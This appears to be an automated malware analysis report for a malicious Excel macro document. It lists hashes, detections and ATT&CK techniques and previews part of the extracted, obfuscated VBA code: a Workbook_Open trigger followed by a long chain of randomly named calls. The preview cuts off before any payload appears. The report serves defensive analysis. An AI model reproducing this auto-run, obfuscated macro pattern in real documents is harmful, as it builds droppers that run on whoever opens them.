Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9cccdb290dbbedfe…

MALICIOUS

Office (OLE)

466.5 KB Created: 2017-07-20 03:50:40 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: 4145a90fd408d592dc5cbcc60e5382db SHA-1: b7abc6f82e2db3292d31928b285d8cdaf2c4f9ec SHA-256: 9cccdb290dbbedfe54beb36d6359e711aee1b20f6b2b1563b32fb459a92d4b95
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is an Excel document containing a Workbook_Open VBA macro, which is a common technique for initiating malicious execution. The macro uses a Shell() call, indicating it attempts to run external commands or download and execute a payload. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or destination, but the presence of the Shell() call and the Workbook_Open event strongly suggests a downloader or dropper functionality.

Heuristics 5

  • ClamAV: Xls.Malware.Valyria-10036513-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 118916 bytes
SHA-256: 7f68b64bf9b5962d9baecf4230bc629a811c145c7e3ee5106d17759bd5bd41bc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub WOrKbOoK_oPEn(): Call lBxJFPAawuYjrCdvsD: End Sub
Sub lBxJFPAawuYjrCdvsD()
Call jnjHzsZgELibSnPETo
End Sub
Static Sub jnjHzsZgELibSnPETo()
Call CLYRHzQipOvkQzFSDu
End Sub
Private Sub CLYRHzQipOvkQzFSDu()
Call mzoyKpHssFcwCcVzLS
End Sub
Function mzoyKpHssFcwCcVzLS() As Currency
Call acwnFbHDjgbzrVcxCs
End Function
Private Sub acwnFbHDjgbzrVcxCs()
Call hNONJukHMyDedMuaqm
End Sub
Private Function hNONJukHMyDedMuaqm() As Single
Call ZqLqkcNQmALbwIsinR
End Function
Function ZqLqkcNQmALbwIsinR() As Long
Call znMiNcUqAqNbPyskHd
End Function
Static Sub znMiNcUqAqNbPyskHd()
Call SoOshjWDLWzOJCvWMl
End Sub
Sub SoOshjWDLWzOJCvWMl()
Call vtVKbgcrokziyOBWMA
End Sub
Function vtVKbgcrokziyOBWMA() As Date
Call zESqqCSVapxQudzUXs
End Function
Private Sub zESqqCSVapxQudzUXs()
Call PLDstMqMxdVEuijrEt
End Sub
Sub PLDstMqMxdVEuijrEt()
Call oaSDvNozoHDggeyaVF
End Sub
Private Function oaSDvNozoHDggeyaVF() As Byte
Call MJviWPcyHZSkmfcpjS
End Function
Private Function MJviWPcyHZSkmfcpjS()
Call DtJxiyaWMZPIxuqmGu
End Function
Static Sub DtJxiyaWMZPIxuqmGu()
Call LWLlBQiMLsDMrRsZVr
End Sub
Static Sub LWLlBQiMLsDMrRsZVr()
Call IxzCHtnUWUUCqQfrYa
End Sub
Sub IxzCHtnUWUUCqQfrYa()
Call nmZvfoBfplrUxqFOZt
End Sub
Sub nmZvfoBfplrUxqFOZt()
Call IDySBtXTvpQDEjfnkB
End Sub
Private Function IDySBtXTvpQDEjfnkB() As Object
Call atCviBEhIgKpWAjhRG
End Function
Private Sub atCviBEhIgKpWAjhRG()
Call QOtxrlheTJURUbarij
End Sub
Private Function QOtxrlheTJURUbarij() As Variant
Call SXIjEJZYmWPZeXpmwW
End Function
Private Sub SXIjEJZYmWPZeXpmwW()
Call MrpatpfThaivHAWFTD
End Sub
Static Function MrpatpfThaivHAWFTD() As Double
Call GWVxWVFNaStSMOCQOm
End Function
Static Sub GWVxWVFNaStSMOCQOm()
Call CGZANzgjQtAkCgFWsT
End Sub
Function CGZANzgjQtAkCgFWsT() As Currency
Call zsLyHcFpZKJbdRrgTE
End Function
Function zsLyHcFpZKJbdRrgTE()
Call SRAIOiwsKNXlcehtDK
End Function
Sub SRAIOiwsKNXlcehtDK()
Call DFQpRYnBNEDxOGxaLi
End Sub
Private Function DFQpRYnBNEDxOGxaLi() As Integer
Call riYeMKnMDgCADAEYCI
End Function
Static Sub riYeMKnMDgCADAEYCI()
Call xSqEReQQhxefoqWBqC
End Sub
Private Sub xSqEReQQhxefoqWBqC()
Call qvnhrLsZHzmcImUJnh
End Sub
Function qvnhrLsZHzmcImUJnh() As Object
Call CXfJqZdOqskZhMMGIh
End Function
Static Function CXfJqZdOqskZhMMGIh() As Integer
Call itqjpTCNgVaPVgXxMB
End Function
Function itqjpTCNgVaPVgXxMB() As Long
Call SLQcNHoqvHOCKYtjJF
End Function
Private Sub SLQcNHoqvHOCKYtjJF()
Call WWNIcddUgMLkGnqhUx
End Sub
Private Function WWNIcddUgMLkGnqhUx() As Integer
Call YIpuCBeZZDeVMbSABm
End Function
Private Function YIpuCBeZZDeVMbSABm() As Integer
Call KtNVioAyueSAsnqnSK
End Function
Static Sub KtNVioAyueSAsnqnSK()
Call jbrzJqoxNwgEypUCgX
End Sub
Static Sub jbrzJqoxNwgEypUCgX()
Call MqwzqnOjoAYaPnZuEo
End Sub
Function MqwzqnOjoAYaPnZuEo() As Byte
Call ElIvqVgFrqNzColiyS
End Function
Function ElIvqVgFrqNzColiyS() As String
Call jPkIZQbSMRsQhcNOcj
End Function
Function jPkIZQbSMRsQhcNOcj() As Byte
Call QwuOLJTPAkaHxjXwDE
End Function
Function QwuOLJTPAkaHxjXwDE() As Date
Call TPHhMgfHQnNQkRkiou
End Function
Static Sub TPHhMgfHQnNQkRkiou()
Call ATEolZOtecXdEghsvO
End Sub
Private Sub ATEolZOtecXdEghsvO()
Call YrjlYbhvzEughwMQmY
End Sub
Function YrjlYbhvzEughwMQmY() As Double
Call OWZUWLfpIXwKHICRaC
End Function
Static Sub OWZUWLfpIXwKHICRaC()
Call qtuGpJbpOZdGQZXyXR
End Sub
Function qtuGpJbpOZdGQZXyXR() As
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.